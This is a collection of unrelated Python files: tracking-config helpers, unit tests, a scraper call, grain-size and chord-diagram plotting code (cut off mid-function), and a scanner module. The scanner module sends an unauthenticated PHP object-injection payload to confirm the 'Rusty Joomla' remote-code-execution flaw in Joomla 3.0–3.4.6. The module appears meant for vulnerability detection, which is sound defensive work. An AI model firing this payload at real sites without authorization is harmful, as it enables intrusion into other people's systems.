f.write(' settings = EnvSettings()\n\n')
f.write(' # Set your local paths here.\n\n')
for attr in dir(settings):
comment_str = None
if attr in comment:
comment_str = comment[attr]
attr_val = getattr(settings, attr)
if not attr.startswith('__') and not callable(attr_val):
if comment_str is None:
f.write(' settings.{} = \'{}\'\n'.format(attr, attr_val))
else:
f.write(' settings.{} = \'{}\' # {}\n'.format(attr, attr_val, comment_str))
f.write('\n return settings\n\n')
def env_settings():
env_module_name = 'pytracking.evaluation.local'
try:
env_module = importlib.import_module(env_module_name)
return env_module.local_env_settings()
except:
env_file = os.path.join(os.path.dirname(__file__), 'local.py')
# Create a default file
create_default_local_file()
raise RuntimeError('YOU HAVE NOT SETUP YOUR local.py!!!\n Go to "{}" and set all the paths you need. '
'Then try to run again.'.format(env_file))
|
import logging
import unittest
import numpy as np
from bokeh.models.widgets import DataTable
from pandas import DataFrame
from cave.utils.bokeh_routines import array_to_bokeh_table
class TestCSV2RH(unittest.TestCase):
def setUp(self):
self.rng = np.random.RandomState(42)
def test_array_to_bokeh_table(self):
dataframe = DataFrame(self.rng.rand(2, 3), columns=[str(i) for i in range(3)])
self.assertTrue(isinstance(array_to_bokeh_table(dataframe), DataTable))
# Pass logger
self.assertTrue(isinstance(array_to_bokeh_table(dataframe, logger=logging.getLogger('test')), DataTable))
# Pass sortable and width
self.assertTrue(isinstance(array_to_bokeh_table(dataframe,
sortable={'1' : True, '2' : True},
width={'1' : 100, '0' : 200}),
DataTable))
# Pass invalid specifications
self.assertRaises(ValueError, array_to_bokeh_table, dataframe, sortable={'7' : True, '2' : True})
self.assertRaises(ValueError, array_to_bokeh_table, dataframe, width={'1' : 100, 10 : 200})
|
from scraper import *
s = Scraper(start=112266, end=114047, max_iter=30, scraper_instance=63)
s.scrape_letterboxd()
|
import pandas as pd
from ms_mint.Resampler import Resampler
def test__Resampler_50ms_minutes_dt():
chrom = pd.Series([0, 10, 5], index=[0, 0.9, 1])
result = Resampler(smooth=False, tau="50ms", unit="minutes").resample(chrom)
tau_in_seconds = result.index[1] * 60
assert tau_in_seconds == 0.05
def test__Resampler_1s_minutes_dt():
chrom = pd.Series([0, 10, 5], index=[0, 0.9, 1])
result = Resampler(smooth=False, tau="1s", unit="minutes").resample(chrom)
tau_in_seconds = result.index[1] * 60
assert tau_in_seconds == 1
def test__Resampler_1s_seconds_dt():
chrom = pd.Series([0, 10, 5], index=[0, 0.9, 1])
result = Resampler(smooth=False, tau="1s", unit="seconds").resample(chrom)
tau_in_seconds = result.index[1]
assert tau_in_seconds == 1
def test__Resampler_smooth_1s_seconds_dt():
chrom = pd.Series([0, 10, 5], index=[0, 0.9, 1])
result = Resampler(smooth=True, tau="1s", unit="seconds").resample(chrom)
tau_in_seconds = result.index[1]
assert tau_in_seconds == 1
|
import requests
# Vuln Base Info
def info():
return {
"author": "cckuailong",
"name": '''Rusty Joomla RCE - Unauthenticated PHP Object Injection in Joomla CMS''',
"description": '''Unauthenticated PHP Object Injection in Joomla CMS from the release 3.0.0 to the 3.4.6 (releases from 2012 to December 2015) that leads to Remote Code Execution.''',
"severity": "critical",
"references": [
"https://blog.hacktivesecurity.com/index.php/2019/10/03/rusty-joomla-rce/",
"https://github.com/kiks7/rusty_joomla_rce"
],
"classification": {
"cvss-metrics": "",
"cvss-score": "",
"cve-id": "",
"cwe-id": ""
},
"metadata":{
"vuln-target": "",
},
"tags": ["joomla", "rce", "unauth", "php", "cms", "objectinjection"],
}
# Vender Fingerprint
def fingerprint(url):
return True
# Proof of Concept
def poc(url):
result = {}
try:
url = format_url(url)
s = requests.Session()
path = """/"""
method = "GET"
data = """"""
headers = {}
resp0 = s.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
path = """/"""
method = "POST"
data = """username=%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0&password=AAA%22%3Bs%3A11%3A%22maonnalezzo%22%3BO%3A21%3A%22JDatabaseDriverMysqli%22%3A3%3A%7Bs%3A4%3A%22%5C0%5C0%5C0a%22%3BO%3A17%3A%22JSimplepieFactory%22%3A0%3A%7B%7Ds%3A21%3A%22%5C0%5C0%5C0disconnectHandlers%22%3Ba%3A1%3A%7Bi%3A0%3Ba%3A2%3A%7Bi%3A0%3BO%3A9%3A%22SimplePie%22%3A5%3A%7Bs%3A8%3A%22sanitize%22%3BO%3A20%3A%22JDatabaseDriverMysql%22%3A0%3A%7B%7Ds%3A5%3A%22cache%22%3Bb%3A1%3Bs%3A19%3A%22cache_name_function%22%3Bs%3A7%3A%22print_r%22%3Bs%3A10%3A%22javascript%22%3Bi%3A9999%3Bs%3A8%3A%22feed_url%22%3Bs%3A40%3A%22http%3A%2F%2Frusty.jooml%2F%3Bpkwxhxqxmdkkmscotwvh%22%3B%7Di%3A1%3Bs%3A4%3A%22init%22%3B%7D%7Ds%3A13%3A%22%5C0%5C0%5C0connection%22%3Bi%3A1%3B%7Ds%3A6%3A%22return%22%3Bs%3A102%3A&option=com_users&task=user.login&{{csrf}}=1"""
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
resp1 = s.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
if ("""http://rusty.jooml/;pkwxhxqxmdkkmscotwvh""" in resp1.text and """Failed to decode session object""" in resp1.text):
result["success"] = True
result["info"] = info()
result["payload"] = url+path
except:
result["success"] = False
return result
# Exploit, can be same with poc()
def exp(url):
return poc(url)
# Utils
def format_url(url):
url = url.strip()
if not ( url.startswith('http://') or url.startswith('https://') ):
url = 'http://' + url
url = url.rstrip('/')
return url
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Style:
Google Python Style Guide:
http://google.github.io/styleguide/pyguide.html
@version 1.0.00
@author-name Wayne Schmidt
@author-email wayne.kirk.schmidt@gmail.com
@license-name APACHE 2.0
@license-url http://www.apache.org/licenses/LICENSE-2.0
"""
__version__ = 1.00
__author__ = "Wayne Schmidt (wayne.kirk.schmidt@gmail.com)"
import os
import sys
import json
from benedict import benedict
JSON_FILE = os.path.abspath(sys.argv[1])
with open (JSON_FILE, "r", encoding='utf8') as fileobject:
myjson = json.load(fileobject)
mydict = benedict(myjson)
keypaths = mydict.keypaths()
for keypath in keypaths:
print(f'path: {keypath}')
|
# ============================================================================ #
# #
# This is part of the "GrainSizeTools Script" #
# A Python script for characterizing grain size from thin sections #
# #
# Copyright (c) 2014-present Marco A. Lopez-Sanchez #
# #
# Licensed under the Apache License, Version 2.0 (the "License"); #
# you may not use this file except in compliance with the License. #
# You may obtain a copy of the License at #
# #
# http://www.apache.org/licenses/LICENSE-2.0 #
# #
# Unless required by applicable law or agreed to in writing, software #
# distributed under the License is distributed on an "AS IS" BASIS, #
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #
# See the License for the specific language governing permissions and #
# limitations under the License. #
# #
# Version 3.0.2 #
# For details see: http://marcoalopez.github.io/GrainSizeTools/ #
# download at https://github.com/marcoalopez/GrainSizeTools/releases #
# #
# ============================================================================ #
# ============================================================================ #
# Functions to generate the plots using the Python matplotlib library. #
# It uses hex color codes to set colors. #
# Save this file in the same directory as GrainSizeTools #
# ============================================================================ #
# import Python scientific modules
import matplotlib.pyplot as plt
import numpy as np
from scipy.stats import norm, gaussian_kde, shapiro, iqr
# plotting funtions
def distribution(data,
plot=('hist', 'kde'),
avg=('amean', 'gmean', 'median', 'mode'),
binsize='auto',
bandwidth='silverman',
**fig_kw):
""" Return a plot with the ditribution of (apparent or actual) grain sizes
in a dataset.
Parameters
----------
data : array_like
the size of the grains
plot : string, tuple or list; optional
the type of plot, either histogram ('hist'), kernel density estimate
('kde') or both ('hist', 'kde'). Default is both.
avg : string, tuple or list; optional
the central tendency measures o show, either the arithmetic ('amean')
or geometric ('gmean') means, the median ('median'), and/or the
KDE-based mode ('mode'). Default all averages.
binsize : string or positive scalar; optional
If 'auto', it defines the plug-in method to calculate the bin size.
When integer or float, it directly specifies the bin size.
Default: the 'auto' method.
| Available plug-in methods:
| 'auto' (fd if sample_size > 1000 or Sturges otherwise)
| 'doane' (Doane's rule)
| 'fd' (Freedman-Diaconis rule)
| 'rice' (Rice's rule)
| 'scott' (Scott rule)
| 'sqrt' (square-root rule)
| 'sturges' (Sturge's rule)
bandwidth : string {'silverman' or 'scott'} or positive scalar; optional
the method to estimate the bandwidth or a scalar directly defining the
bandwidth. It uses the Silverman plug-in method by default.
**fig_kw :
additional keyword arguments to control the size (figsize) and
resolution (dpi) of the plot. Default figsize is (6.4, 4.8).
Default resolution is 100 dpi.
Call functions
--------------
- gaussian_kde (from Scipy stats)
Examples
--------
>>> distribution(data['diameters'])
>>> distribution(data['diameters'], figsize=(6.4, 4.8))
Returns
-------
A plot showing the distribution of (apparent) grain sizes and
the location of the averages defined.
"""
fig, ax = plt.subplots(**fig_kw)
if 'hist' in plot:
if isinstance(binsize, (int, float)):
binsize = int(np.ceil((data.max() - data.min()) / binsize))
y_values, bins, __ = ax.hist(data,
bins=binsize,
range=(data.min(), data.max()),
density=True,
color='#80419d',
edgecolor='#C59fd7',
alpha=0.7)
print('=======================================')
print('Number of classes = ', len(bins) - 1)
print('binsize = ', round(bins[1] - bins[0], 2))
print('=======================================')
if 'kde' in plot:
# estimate kde first
if isinstance(bandwidth, (int, float)):
fixed_bw = bandwidth / np.std(data, ddof=1)
kde = gaussian_kde(data, bw_method=fixed_bw)
elif isinstance(bandwidth, str):
kde = gaussian_kde(data, bw_method=bandwidth)
bandwidth = round(kde.covariance_factor() * data.std(ddof=1), 2)
else:
raise ValueError("bandwidth must be integer, float, or plug-in methods 'silverman' or 'scott'")
x_values = np.linspace(data.min(), data.max(), num=1000)
y_values = kde(x_values)
print('=======================================')
print('KDE bandwidth = ', round(bandwidth, 2))
print('=======================================')
if 'hist' in plot:
ax.plot(x_values, y_values,
color='#2F4858')
else:
ax.plot(x_values, y_values,
color='#2F4858')
ax.fill_between(x_values, y_values,
color='#80419d',
alpha=0.65)
# plot the location of the averages
if 'amean' in avg:
amean = np.mean(data)
ax.vlines(amean, 0, np.max(y_values),
linestyle='solid',
color='#2F4858',
label='arith. mean',
linewidth=2.5)
if 'gmean' in avg:
gmean = np.exp(np.mean(np.log(data)))
ax.vlines(gmean, 0, np.max(y_values),
linestyle='solid',
color='#fec44f',
label='geo. mean')
if 'median' in avg:
median = np.median(data)
ax.vlines(median, 0, np.max(y_values),
linestyle='dashed',
color='#2F4858',
label='median',
linewidth=2.5)
if 'mode' in avg and 'kde' in plot:
mode = x_values[np.argmax(y_values)]
ax.vlines(mode, 0, np.max(y_values),
linestyle='dotted',
color='#2F4858',
label='mode',
linewidth=2.5)
ax.set_ylabel('density', color='#252525')
ax.set_xlabel(r'apparent diameter ($\mu m$)', color='#252525')
ax.legend(loc='best', fontsize=16)
# ax.set_ylim(bottom=-0.001)
fig.tight_layout()
return fig, ax
def area_weighted(diameters, areas, binsize='auto', **fig_kw):
""" Generate an area-weighted histogram and returns different
area-weighted statistics.
Parameters
----------
diameters : array_like
the size of the grains
areas : array_like
the sectional areas of the grains
binsize : string or positive scalar, optional
If 'auto', it defines the plug-in method to calculate the bin size.
When integer or float, it directly specifies the bin size.
Default: the 'auto' method.
| Available plug-in methods:
| 'auto' (fd if sample_size > 1000 or Sturges otherwise)
| 'doane' (Doane's rule)
| 'fd' (Freedman-Diaconis rule)
| 'rice' (Rice's rule)
| 'scott' (Scott rule)
| 'sqrt' (square-root rule)
| 'sturges' (Sturge's rule)
**fig_kw :
additional keyword arguments to control the size (figsize) and
resolution (dpi) of the plot. Default figsize is (6.4, 4.8).
Default resolution is 100 dpi.
Examples
--------
>>> area_weighted(data['diameters'], data['Areas'])
>>> area_weighted(data['diameters'], data['Areas'], binsize='doane', dpi=300)
"""
# estimate weighted mean
area_total = np.sum(areas)
weighted_areas = areas / area_total
weighted_mean = np.sum(diameters * weighted_areas)
# estimate mode interval
if type(binsize) is str:
histogram, bin_edges = np.histogram(diameters, bins=binsize, range=(0.0, diameters.max()))
h = bin_edges[1]
else:
bin_edges = np.arange(0.0, diameters.max() + binsize, binsize)
h = binsize
# estimate the cumulative areas of each grain size interval
cumulativeAreas = np.zeros(len(bin_edges))
for index, values in enumerate(bin_edges):
mask = np.logical_and(diameters >= values, diameters < (values + h))
area_sum = np.sum(areas[mask])
cumulativeAreas[index] = round(area_sum, 1)
# get the index of the modal interval
getIndex = np.argmax(cumulativeAreas)
print('=======================================')
print('DESCRIPTIVE STATISTICS')
print(f'Area-weighted mean grain size = {weighted_mean:0.2f} microns')
print('=======================================')
print('HISTOGRAM FEATURES')
print(f'The modal interval is {bin_edges[getIndex]:0.2f} - {bin_edges[getIndex] + h:0.2f} microns')
if type(binsize) is str:
print(f'The number of classes are {len(histogram)}')
print(f'The bin size is {h:0.2f} according to the {binsize} rule')
print('=======================================')
# normalize the y-axis values to percentage of the total area
totalArea = sum(cumulativeAreas)
cumulativeAreasNorm = [(x / float(totalArea)) * 100 for x in cumulativeAreas]
maxValue = max(cumulativeAreasNorm)
#make plot
fig, ax = plt.subplots(**fig_kw)
# figure aesthetics
ax.bar(bin_edges, cumulativeAreasNorm, width=h,
color='#55A868',
edgecolor='#FEFFFF',
align='edge',
alpha=1)
ax.vlines(weighted_mean, ymin=0, ymax=maxValue,
linestyle='--',
color='#1F1F1F',
label='area weighted mean',
linewidth=2)
ax.set_ylabel('normalized area fraction (%)', color='#252525')
ax.set_xlabel(r'apparent diameter ($\mu m$)', color='#252525')
ax.legend(loc='best', fontsize=15)
fig.tight_layout()
return fig, ax
def normalized(data, avg='amean', bandwidth='silverman', **fig_kw):
"""Return a log-transformed normalized ditribution of the grain
population. This is useful to compare grain size distributions
beween samples with different average values.
Parameters
----------
data : array-like
the dataset
avg : str, optional
the normalization factor, either 'amean' or 'median'.
Default: 'amean'
bandwidth : str or scalar, optional
the bandwidth of the KDE, by default 'silverman'
**fig_kw :
additional keyword arguments to control the size (figsize) and
resolution (dpi) of the plot. Default figsize is (6.4, 4.8).
Default resolution is 100 dpi.
"""
data = np.log(data)
amean = np.mean(data)
median = np.median(data)
# normalize the data
if avg == 'amean':
norm_factor = amean
norm_data = data / norm_factor
elif avg == 'median':
norm_factor = median
norm_data = data / median
else:
raise ValueError("Normalization factor has to be defined as 'amean' or 'median'")
# estimate KDE
if isinstance(bandwidth, (int, float)):
fixed_bw = bandwidth / np.std(norm_data, ddof=1)
kde = gaussian_kde(norm_data, bw_method=fixed_bw)
elif isinstance(bandwidth, str):
kde = gaussian_kde(norm_data, bw_method=bandwidth)
bandwidth = round(kde.covariance_factor() * norm_data.std(ddof=1), 2)
else:
raise ValueError("bandwidth must be integer, float, or plug-in methods 'silverman' or 'scott'")
x_values = np.linspace(norm_data.min(), norm_data.max(), num=1000)
y_values = kde(x_values)
# Provide details
print('=======================================')
if avg == 'amean':
print(f'Normalized SD = {np.std(norm_data):0.3f}')
if avg == 'median':
print(f'Normalized IQR = {iqr(norm_data):0.3f}')
print('KDE bandwidth = ', round(bandwidth, 2))
print('=======================================')
#make plot
fig, ax = plt.subplots(**fig_kw)
ax.plot(x_values, y_values,
color='#2F4858')
ax.fill_between(x_values, y_values,
color='#d1346b',
alpha=0.5)
ax.vlines(amean / norm_factor, 0, np.max(y_values),
linestyle='solid',
color='#2F4858',
label='arith. mean',
linewidth=2.5)
ax.vlines(median / norm_factor, 0, np.max(y_values),
linestyle='dashed',
color='#2F4858',
label='median',
linewidth=2.5)
ax.set_ylabel('density', color='#252525')
if avg == 'amean':
ax.set_xlabel(r'normalized log grain size ($y / \bar{y}$)', color='#252525')
else:
ax.set_xlabel(r'normalized log grain size ($y / med_{y}$)', color='#252525')
ax.legend(loc='best', fontsize=15)
fig.tight_layout()
return fig, ax
def qq_plot(data, percent=2, **fig_kw):
""" Test whether the underlying distribution follows a lognormal
distribution using a quantile–quantile (q-q) plot and a Shapiro-
Wilk test.
Parameters
----------
data : array-like
the apparent diameters or any other type of data
percent : scalar between 0 and 100
the percentil interval to estimate, default is 2 %
Call functions
--------------
shapiro from scipy's stats
"""
data = np.sort(np.log(data))
# estimate percentiles in the actual data
percentil = np.arange(1, 100, percent)
actual_data = np.percentile(data, percentil)
# estimate percentiles for theoretical data
mean, std = np.mean(data), np.std(data)
theoretical_data = norm.ppf(percentil / 100, loc=mean, scale=std)
min_val, max_val = theoretical_data.min(), theoretical_data.max()
# make the plot
fig, ax = plt.subplots(**fig_kw)
ax.plot([min_val, max_val], [min_val, max_val],
'-',
color='#2F4858',
label='perfect lognormal')
ax.plot(theoretical_data, actual_data,
'o',
color='C0',
alpha=0.5)
ax.spines['right'].set_visible(False)
ax.spines['top'].set_visible(False)
ax.set_xlabel('theoretical', color='#252525')
ax.set_ylabel('observed', color='#252525')
ax.legend(loc='best', fontsize=18)
# ax.set_aspect('equal')
fig.tight_layout()
# Shapiro-Wilk test
if len(data) > 250:
W, p_value = shapiro(np.random.choice(data, size=250))
else:
W, p_value = shapiro(data)
print('=======================================')
print('Shapiro-Wilk test (lognormal):')
print(f'{W:0.2f}, {p_value:0.2f} (test statistic, p-value)')
if p_value >= 0.05:
print('It looks like a lognormal distribution')
print('(⌐■_■)')
else:
print('It doesnt look like a lognormal distribution (p-value < 0.05)')
print('(╯°□°)╯︵ ┻━┻')
print('=======================================')
return fig, ax
if __name__ == '__main__':
pass
else:
print('module plot imported')
|
"""
Tools to draw a chord diagram in python
"""
from collections.abc import Sequence
import matplotlib.patches as patches
from matplotlib.colors import ColorConverter
from matplotlib.path import Path
import numpy as np
import scipy.sparse as ssp
from .gradient import gradient
from .utilities import _get_normed_line, dist, polar2xy
LW = 0.3
def chord_diagram(mat, names=None, order=None, width=0.1, pad=2., gap=0.03,
chordwidth=0.7, ax=None, colors=None, cmap=None, alpha=0.7,
use_gradient=False, chord_colors=None, show=False, **kwargs):
"""
Plot a chord diagram.
Parameters
----------
mat : square matrix
Flux data, mat[i, j] is the flux from i to j
names : list of str, optional (default: no names)
Names of the nodes that will be displayed (must be ordered as the
matrix entries).
order : list, optional (default: order of the matrix entries)
Order in which the arcs should be placed around the trigonometric
circle.
width : float, optional (default: 0.1)
Width/thickness of the ideogram arc.
pad : float, optional (default: 2)
Distance between two neighboring ideogram arcs. Unit: degree.
gap : float, optional (default: 0)
Distance between the arc and the beginning of the cord.
chordwidth : float, optional (default: 0.7)
Position of the control points for the chords, controlling their shape.
ax : matplotlib axis, optional (default: new axis)
Matplotlib axis where the plot should be drawn.
colors : list, optional (default: from `cmap`)
List of user defined colors or floats.
cmap : str or colormap object (default: viridis)
Colormap that will be used to color the arcs and chords by default.
See `chord_colors` to use different colors for chords.
alpha : float in [0, 1], optional (default: 0.7)
Opacity of the chord diagram.
use_gradient : bool, optional (default: False)
Whether a gradient should be use so that chord extremities have the
same color as the arc they belong to.
chord_colors : str, or list of colors, optional (default: None)
Specify color(s) to fill the chords differently from the arcs.
When the keyword is not used, chord colors default to the colomap given
by `colors`.
Possible values for `chord_colors` are:
* a single color (do not use an RGB tuple, use hex format instead),
e.g. "red" or "#ff0000"; all chords will have this color
* a list of colors, e.g. ``["red", "green", "blue"]``, one per node
(in this case, RGB tuples are accepted as entries to the list).
Each chord will get its color from its associated source node, or
from both nodes if `use_gradient` is True.
show : bool, optional (default: False)
Whether the plot should be displayed immediately via an automatic call
to `plt.show()`.
kwargs : keyword arguments
Available kwargs are:
================ ================== ===============================
Name Type Purpose and possible values
================ ================== ===============================
fontcolor str or list Color of the names
fontsize int Size of the font for names
rotate_names (list of) bool(s) Rotate names by 90°
sort str Either "size" or "distance"
zero_entry_size float Size of zero-weight reciprocal
================ ================== ===============================
"""
import matplotlib.pyplot as plt
if ax is None:
_, ax = plt.subplots()
# copy matrix and set a minimal value for visibility of zero fluxes
is_sparse = ssp.issparse(mat)
if is_sparse:
mat = mat.tocsr(copy=True)
else:
mat = np.array(mat, copy=True)
# mat[i, j]: i -> j
num_nodes = mat.shape[0]
# set entry size for zero entries that have a nonzero reciprocal
min_deg = kwargs.get("zero_entry_size", 0.5)
min_deg *= mat.sum() / (360 - num_nodes*pad)
if is_sparse:
nnz = mat.nonzero()
for i, j in zip(*nnz):
if mat[j, i] == 0:
mat[j, i] = min_deg
else:
zeros = np.argwhere(mat == 0)
for (i, j) in zeros:
if mat[j, i] != 0:
mat[i, j] = min_deg
# check name rotations
rotate_names = kwargs.get("rotate_names", False)
if isinstance(rotate_names, Sequence):
assert len(rotate_names) == num_nodes, \
"Wrong number of entries in 'rotate_names'."
else:
rotate_names = [rotate_names]*num_nodes
# check order
if order is not None:
mat = mat[order][:, order]
rotate_names = [rotate_names[i] for i in order]
if names is not None:
names = [names[i] for i in order]
if colors is not None:
colors = [colors[i] for i in order]
# sum over rows
x = mat.sum(axis=1).A1 if is_sparse else mat.sum(axis=1)
# configure colors
if colors is None:
colors = np.linspace(0, 1, num_nodes)
fontcolor = kwargs.get("fontcolor", "k")
if isinstance(fontcolor, str):
fontcolor = [fontcolor]*num_nodes
else:
assert len(fontcolor) == num_nodes, \
"One fontcolor per node is required."
if cmap is None:
cmap = "viridis"
if isinstance(colors, (list, tuple, np.ndarray)):
assert len(colors) == num_nodes, "One color per node is required."
# check color type
first_color = colors[0]
if isinstance(first_color, (int, float, np.integer)):
cm = plt.get_cmap(cmap)
colors = cm(colors)[:, :3]
else:
colors = [ColorConverter.to_rgb(c) for c in colors]
else:
raise ValueError("`colors` should be a list.")
if chord_colors is None:
chord_colors = colors
else:
try:
chord_colors = [ColorConverter.to_rgb(chord_colors)] * num_nodes
except ValueError:
assert len(chord_colors) == num_nodes, \
"If `chord_colors` is a list of colors, it should include " \
"one color per node (here {} colors).".format(num_nodes)
# find position for each start and end
y = x / np.sum(x).astype(float) * (360 - pad*len(x))
pos = {}
arc = []
nodePos = []
rotation = []
start = 0
# compute all values and optionally apply sort
for i in range(num_nodes):
end = start + y[i]
arc.append((start, end))
angle = 0.5*(start+end)
if -30 <= angle <= 180:
angle -= 90
rotation.append(False)
else:
angle -= 270
rotation.append(True)
nodePos.append(
tuple(polar2xy(1.05, 0.5*(start + end)*np.pi/180.)) + (angle,))
z = _get_normed_line(mat, i, x, start, end, is_sparse)
# sort chords
ids = None
if kwargs.get("sort", "size") == "size":
ids = np.argsort(z)
elif kwargs["sort"] == "distance":
remainder = 0 if num_nodes % 2 else -1
ids = list(range(i - int(0.5*num_nodes), i))[::-1]
ids += [i]
ids += list(range(i + int(0.5*num_nodes) + remainder, i, -1))
# put them back into [0, num_nodes[
ids = np.array(ids)
ids[ids < 0] += num_nodes
ids[ids >= num_nodes] -= num_nodes
else:
raise ValueError("Invalid `sort`: '{}'".format(kwargs["sort"]))
z0 = start
for j in ids:
pos[(i, j)] = (z0, z0 + z[j])
z0 += z[j]
start = end + pad
# plot
for i in range(len(x)):
color = colors[i]
# plot the arcs
start, end = arc[i]
ideogram_arc(start=start, end=end, radius=1.0, color=color,
width=width, alpha=alpha, ax=ax)
start, end = pos[(i, i)]
chord_color = chord_colors[i]
# plot self-chords
if mat[i, i] > 0:
self_chord_arc(start, end, radius=1 - width - gap,
chordwidth=0.7*chordwidth, color=chord_color,
alpha=alpha, ax=ax)
# plot all other chords
for j in range(i):
cend = chord_colors[j]
start1, end1 = pos[(i, j)]
start2, end2 = pos[(j, i)]
if mat[i, j] > 0 or mat[j, i] > 0:
chord_arc(
start1, end1, start2, end2, radius=1 - width - gap,
chordwidth=chordwidth, color=chord_color, cend=cend,
alpha=alpha, ax=ax, use_gradient=use_gradient)
# add names if necessary
if names is not None:
assert len(names) == num_nodes, "One name per node is required."
prop = {
"fontsize": kwargs.get("fontsize", 16*0.8),
"ha": "center",
"va": "center",
"rotation_mode": "anchor"
}
for i, (pos, name, r) in enumerate(zip(nodePos, names, rotation)):
rotate = rotate_names[i]
pp = prop.copy()
pp["color"] = fontcolor[i]
if rotate:
angle = np.average(arc[i])
rotate = 90
if 90 < angle < 180 or 270 < angle:
rotate = -90
if 90 < angle < 270:
pp["ha"] = "right"
else:
pp["ha"] = "left"
elif r:
pp["va"] = "top"
else:
pp["va"] = "bottom"
ax.text(pos[0], pos[1], name, rotation=pos[2] + rotate, **pp)
# configure axis
ax.set_xlim(-1.1, 1.1)
ax.set_ylim(-1.1, 1.1)
ax.set_aspect(1)
ax.axis('off')
plt.tight_layout()
if show:
plt.show()
return nodePos
# ------------ #
# Subfunctions #
# ------------ #
def initial_path(start, end, radius, width, factor=4/3):
''' First 16 vertices and 15 instructions are the same for everyone '''
if start > end:
start, end = end, start
start *= np.pi/180.
end *= np.pi/180.
# optimal distance to the control points
# https://stackoverflow.com/questions/1734745/
# how-to-create-circle-with-b%C3%A9zier-curves
# use 16-vertex curves (4 quadratic Beziers which accounts for worst case
# scenario of 360 degrees)
inner = radius*(1-width)
opt = factor * np.tan((end-start)/ 16.) * radius
inter1 = start*(3./4.)+end*(1./4.)
inter2 = start*(2./4.)+end*(2./4.)
inter3 = start*(1./4.)+end*(3./4.)
verts = [
polar2xy(radius, start),
polar2xy(radius, start) + polar2xy(opt, start+0.5*np.pi),
polar2xy(radius, inter1) + polar2xy(opt, inter1-0.5*np.pi),
polar2xy(radius, inter1),
polar2xy(radius, inter1),
polar2xy(radius, inter1) + polar2xy(opt, inter1+0.5*np.pi),
polar2xy(radius, inter2) + polar2xy(opt, inter2-0.5*np.pi),
polar2xy(radius, inter2),
polar2xy(radius, inter2),
polar2xy(radius, inter2) + polar2xy(opt, inter2+0.5*np.pi),
polar2xy(radius, inter3) + polar2xy(opt, inter3-0.5*np.pi),
polar2xy(radius, inter3),
polar2xy(radius, inter3),
polar2xy(radius, inter3) + polar2xy(opt, inter3+0.5*np.pi),
polar2xy(radius, end) + polar2xy(opt, end-0.5*np.pi),
polar2xy(radius, end)
]
codes = [
Path.MOVETO,
Path.CURVE4,
Path.CURVE4,
Path.CURVE4,
Path.LINETO,
Path.CURVE4,
Path.CURVE4,
Path.CURVE4,
Path.LINETO,
Path.CURVE4,
Path.CURVE4,
Path.CURVE4,
Path.LINETO,
Path.CURVE4,
Path.CURVE4,
Path.CURVE4,
]
return start, end, verts, codes
def ideogram_arc(start, end, radius=1., width=0.2, color="r", alpha=0.7,
ax=None):
'''
Draw an arc symbolizing a region of the chord diagram.
Parameters
----------
start : float (degree in 0, 360)
Starting degree.
end : float (degree in 0, 360)
Final degree.
radius : float, optional (default: 1)
External radius of the arc.
width : float, optional (default: 0.2)
Width of the arc.
ax : matplotlib axis, optional (default: not plotted)
Axis on which the arc should be plotted.
color : valid matplotlib color, optional (default: "r")
Color of the arc.
Returns
-------
verts, codes : lists
Vertices and path instructions to draw the shape.
'''
start, end, verts, codes = initial_path(start, end, radius, width)
opt = 4./3. * np.tan((end-start)/ 16.) * radius
inner = radius*(1-width)
inter1 = start*(3./4.) + end*(1./4.)
inter2 = start*(2./4.) + end*(2./4.)
inter3 = start*(1./4.) + end*(3./4.)
verts += [
polar2xy(inner, end),
polar2xy(inner, end) + polar2xy(opt*(1-width), end-0.5*np.pi),
polar2xy(inner, inter3) + polar2xy(opt*(1-width), inter3+0.5*np.pi),
polar2xy(inner, inter3),
polar2xy(inner, inter3),
polar2xy(inner, inter3) + polar2xy(opt*(1-width), inter3-0.5*np.pi),
polar2xy(inner, inter2) + polar2xy(opt*(1-width), inter2+0.5*np.pi),
polar2xy(inner, inter2),
polar2xy(inner, inter2),
polar2xy(inner, inter2) + polar2xy(opt*(1-width), inter2-0.5*np.pi),
polar2xy(inner, inter1) + polar2xy(opt*(1-width), inter1+0.5*np.pi),
polar2xy(inner, inter1),
polar2xy(inner, inter1),
polar2xy(inner, inter1) + polar2xy(opt*(1-width), inter1-0.5*np.pi),
polar2xy(inner, start) + polar2xy(opt*(1-width), start+0.5*np.pi),
polar2xy(inner, start),
polar2xy(radius, start),
]
codes += [
Path.LINETO,
Path.CURVE4,
Path.CURVE4,
Path.CURVE4,
Path.LINETO,
Path.CURVE4,
Path.CURVE4,
Path.CURVE4,
Path.LINETO,
Path.CURVE4,
Path.CURVE4,
Path.CURVE4,
Path.LINETO,
Path.CURVE4,
Path.CURVE4,
Path.CURVE4,
Path.CLOSEPOLY,
]
if ax is not None:
path = Path(verts, codes)
patch = patches.PathPatch(path, facecolor=color, alpha=alpha,
edgecolor=color, lw=LW)
ax.add_patch(patch)
return verts, codes
def chord_arc(start1, end1, start2, end2, radius=1.0, pad=2, chordwidth=0.7,
ax=None, color="r", cend="r", alpha=0.7, use_gradient=False):
'''
Draw a chord between two regions (arcs) of the chord diagram.
Parameters
----------
start1 : float (degree in 0, 360)
Starting degree.
end1 : float (degree in 0, 360)
Final degree.
start2 : float (degree in 0, 360)
Starting degree.
end2 : float (degree in 0, 360)
Final degree.
radius : float, optional (default: 1)
External radius of the arc.
chordwidth : float, optional (default: 0.2)
Width of the chord.
ax : matplotlib axis, optional (default: not plotted)
Axis on which the chord should be plotted.
color : valid matplotlib color, optional (default: "r")
Color of the chord or of its beginning if `use_gradient` is True.
cend : valid matplotlib color, optional (default: "r")
Color of the end of the chord if `use_gradient` is True.
alpha : float, optional (default: 0.7)
Opacity of the chord.
use_gradient : bool, optional (default: False)
Whether a gradient should be use so that chord extremities have the
same color as the arc they belong to.
Returns
-------
verts, codes : lists
Vertices and path instructions to draw the shape.
'''
chordwidth2 = chordwidth
dtheta1 = min((start1 - end2) % 360, (end2 - start1) % 360)
dtheta2 = min((end1 - start2) % 360, (start2 - end1) % 360)
start1, end1, verts, codes = initial_path(start1, end1, radius, chordwidth)
start2, end2, verts2, _ = initial_path(start2, end2, radius, chordwidth)
